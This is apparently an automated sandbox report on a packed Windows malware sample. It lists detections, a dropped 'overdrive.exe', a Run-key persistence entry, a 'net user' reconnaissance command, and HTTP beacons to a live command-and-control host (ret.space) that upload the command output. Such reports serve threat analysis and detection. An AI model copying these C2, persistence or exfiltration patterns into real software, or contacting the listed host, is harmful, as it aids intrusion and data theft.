Windows Analysis Report jvcMPyQ76c

Overview

General Information

Sample Name: jvcMPyQ76c (renamed file extension from none to exe)
Analysis ID: 492654
MD5: dbc056b39057f701a967102b2ec2083e
SHA1: db78a335937e3685b5f49f384a94224ff429ab12
SHA256: d841ce25ed61572cb31a864c67b9f35d36e781e601d1539674cce9f077d80b29
Tags: exe
Infos:

Most interesting Screenshot:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Drops PE files
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: jvcMPyQ76c.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: jvcMPyQ76c.exe Virustotal: Detection: 62% Perma Link
Source: jvcMPyQ76c.exe ReversingLabs: Detection: 57%
Multi AV Scanner detection for domain / URL
Source: ret.space Virustotal: Detection: 8% Perma Link
Source: http://ret.space/if-modified-sinceillegal Virustotal: Detection: 6% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\overdrive.exe Avira: detection malicious, Label: TR/Agent.fbrrp
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\overdrive.exe ReversingLabs: Detection: 57%

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.105.155.183 172.105.155.183
Source: jvcMPyQ76c.exe, 00000001.00000002.615806031.000000C04200C000.00000004.00000001.sdmp, jvcMPyQ76c.exe, 00000001.00000002.616806326.000000C042112000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/checkin?host=830021&user=user
Source: jvcMPyQ76c.exe, 00000001.00000002.615806031.000000C04200C000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/checkin?host=830021&user=user.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.
Source: jvcMPyQ76c.exe, 00000001.00000002.617019301.000000C042150000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/command?id=bmV0IHVzZQ%3D%3D
Source: jvcMPyQ76c.exe, 00000001.00000002.617005109.000000C04214C000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/command?id=bmV0IHVzZQ%3D%3DContent-Type:
Source: overdrive.exe, 00000006.00000002.387882880.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://ret.space/if-modified-sinceillegal
Source: jvcMPyQ76c.exe, 00000001.00000002.616806326.000000C042112000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/result
Source: jvcMPyQ76c.exe, 00000001.00000002.615824247.000000C04200E000.00000004.00000001.sdmp String found in binary or memory: http://ret.space/resultUser-Agent:
Source: unknown HTTP traffic detected: POST /result HTTP/1.1Host: ret.spaceUser-Agent: Go-http-client/1.1Content-Length: 417Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipData Raw: 69 64 3d 62 6d 56 30 49 48 56 7a 5a 51 25 33 44 25 33 44 26 72 65 73 75 6c 74 3d 44 51 70 56 63 32 56 79 49 47 46 6a 59 32 39 31 62 6e 52 7a 49 47 5a 76 63 69 42 63 58 45 52 46 55 30 74 55 54 31 41 74 4e 7a 45 32 56 44 63 33 4d 51 30 4b 44 51 6f 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 44 51 70 42 5a 47 31 70 62 6d 6c 7a 64 48 4a 68 64 47 39 79 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 52 47 56 6d 59 58 56 73 64 45 46 6a 59 32 39 31 62 6e 51 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 56 75 5a 32 6c 75 5a 57 56 79 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 4e 43 6b 64 31 5a 58 4e 30 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 58 52 45 46 48 56 58 52 70 62 47 6c 30 65 55 46 6a 59 32 39 31 62 6e 51 67 49 43 41 67 49 43 41 67 44 51 70 55 61 47 55 67 59 32 39 74 62 57 46 75 5a 43 42 6a 62 32 31 77 62 47 56 30 5a 57 51 67 63 33 56 6a 59 32 56 7a 63 32 5a 31 62 47 78 35 4c 67 30 4b 44 51 6f 25 33 44 Data Ascii: id=bmV0IHVzZQ%3D%3D&result=DQpVc2VyIGFjY291bnRzIGZvciBcXERFU0tUT1AtNzE2VDc3MQ0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgRGVmYXVsdEFjY291bnQgICAgICAgICAgIGVuZ2luZWVyICAgICAgICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICBXREFHVXRpbGl0eUFjY291bnQgICAgICAgDQpUaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KDQo%3D
Source: unknown DNS traffic detected: queries for: ret.space
Source: global traffic HTTP traffic detected: GET /checkin?host=830021&user=user HTTP/1.1Host: ret.spaceUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /command?id=bmV0IHVzZQ%3D%3D HTTP/1.1Host: ret.spaceUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /command?id=bmV0IHVzZQ%3D%3D HTTP/1.1Host: ret.spaceUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: jvcMPyQ76c.exe Virustotal: Detection: 62%
Source: jvcMPyQ76c.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe File read: C:\Users\user\Desktop\jvcMPyQ76c.exe Jump to behavior
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\jvcMPyQ76c.exe 'C:\Users\user\Desktop\jvcMPyQ76c.exe'
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\overdrive.exe 'C:\Users\user\AppData\Local\Temp\overdrive.exe'
Source: C:\Users\user\AppData\Local\Temp\overdrive.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'net user'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'net user' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user Jump to behavior
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Mutant created: \Sessions\1\BaseNamedObjects\)!VoqA.I4
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe File created: C:\Users\user\AppData\Local\Temp\overdrive.exe Jump to behavior
Source: classification engine Classification label: mal80.winEXE@10/1@30/1
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: jvcMPyQ76c.exe Static file information: File size 1419872 > 1048576
Source: jvcMPyQ76c.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x15a600

Data Obfuscation:

barindex
PE file contains sections with non-standard names
Source: jvcMPyQ76c.exe Static PE information: section name: UPX2
Source: overdrive.exe.1.dr Static PE information: section name: UPX2
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe File created: C:\Users\user\AppData\Local\Temp\overdrive.exe Jump to dropped file
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run overdrive Jump to behavior
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run overdrive Jump to behavior
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\overdrive.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\overdrive.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: jvcMPyQ76c.exe, 00000001.00000002.615324474.0000000000B63000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyyl
Source: overdrive.exe, 00000006.00000002.388454176.0000000000C13000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\jvcMPyQ76c.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'net user' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user Jump to behavior
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 492654 Sample: jvcMPyQ76c Startdate: 28/09/2021 Architecture: WINDOWS Score: 80 28 ret.space 2->28 32 Multi AV Scanner detection for domain / URL 2->32 34 Antivirus / Scanner detection for submitted sample 2->34 36 Multi AV Scanner detection for submitted file 2->36 9 overdrive.exe 1 2->9         started        12 jvcMPyQ76c.exe 1 2 2->12         started        signatures3 process4 dnsIp5 38 Antivirus detection for dropped file 9->38 40 Multi AV Scanner detection for dropped file 9->40 16 conhost.exe 9->16         started        30 ret.space 172.105.155.183, 49736, 49814, 80 LINODE-APLinodeLLCUS United States 12->30 26 C:\Users\user\AppData\Local\...\overdrive.exe, PE32+ 12->26 dropped 18 cmd.exe 1 12->18         started        20 conhost.exe 12->20         started        file6 signatures7 process8 process9 22 net.exe 1 18->22         started        process10 24 net1.exe 1 22->24         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.105.155.183
 ret.space United States
63949 LINODE-APLinodeLLCUS true

Contacted Domains

Name IP Active
ret.space 172.105.155.183 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ret.space/result true
  • Avira URL Cloud: safe
 unknown
http://ret.space/command?id=bmV0IHVzZQ%3D%3D true
  • Avira URL Cloud: safe
 unknown
http://ret.space/checkin?host=830021&user=user true
  • Avira URL Cloud: safe
 unknown